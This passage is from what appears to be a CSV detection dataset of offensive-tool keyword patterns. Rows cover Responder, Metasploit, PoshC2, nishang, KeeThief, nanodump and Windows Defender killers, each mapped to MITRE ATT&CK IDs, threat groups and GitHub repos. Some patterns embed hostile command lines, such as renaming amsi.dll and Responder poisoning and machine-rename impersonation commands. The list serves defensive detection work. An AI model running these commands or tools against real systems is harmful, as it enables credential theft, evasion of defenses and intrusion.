traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Remove-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*RemoveKeePassTrigger.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*remove-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-Persistence.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*remove-persistence-cron*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-PoshRat*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*removeRegTrace*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*Remove-Update.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Remove-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ren C:\Windows\System32\amsi.dll *.dll,greyware_tool_keyword,ren,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*renameMachine.py -current-name * -new-name * -dc-ip * *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*renameMachine.py -current-name * -new-name*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ,TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*replace_key_iv_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*replace_video_fake_plugin*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*RequestAsPython-PowerShell.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*reshacker_setup.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*ResourceDevelopment_EstablishAccounts_RGPerson.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_Server_DNSLog.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_Server_LDAPServer.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*ResourceDevelopment_WebServices_TencentAPIGateway.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Resources/Design/NinjaStyle.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Resources/drone.dll*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Resources\donut.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*responder * --lm*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder -i *,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder --interface*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Responder/tools/MultiRelay/bin/Runas.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder/tools/MultiRelay/bin/Syssvc.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*responder-http-off*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*responder-http-on*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder-Session.log*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*responder-smb-off*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*responder-smb-on*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Responder-Windows*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*RestartKeePass.ps1*,offensive_tool_keyword,crackmapexec,Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*restic2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*restore_signature.sh *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*RestrictedAdmin.exe*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z -*return-wizard-rce-exim.txt*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*rev_kali_192_168_0_110_1234*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*reveng007/C2_Server*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*reveng007/DarkWidow*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*reveng007/Executable_Files*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*reveng007/ReflectiveNtdll*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*reveng007/SharpGmailC2*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*reverse_shell_minified.js*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*reverse_tcp_x64.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reverse_win_http.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reverseDisableWinDef.cpp*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*ReverseProxy.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*ReverseShell.ps1*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*ReverseShell_20*.ps1*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*ReverseSocksProxyHandler.*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*ReverseSocksProxyHandler.py*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*ReversingID/Shellcode-Loader*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*RevertToSelf was successful*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Revoke-Obfuscation*,offensive_tool_keyword,Invoke-DOSfuscation,Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts,T1027 - T1083 - T1059,TA0002 - TA0007 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Revoke-Obfuscation,1,1,N/A,N/A,7,667,121,2020-02-11T19:40:37Z,2017-07-11T01:20:48Z -*RevWinDefKiller.exe*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*RhinoSecurityLabs*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/RhinoSecurityLabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*RhinoSecurityLabs/pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*-Rhost * -Port * -Cmd *cmd /c*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-Jenkins.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*rhosts_walker_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing 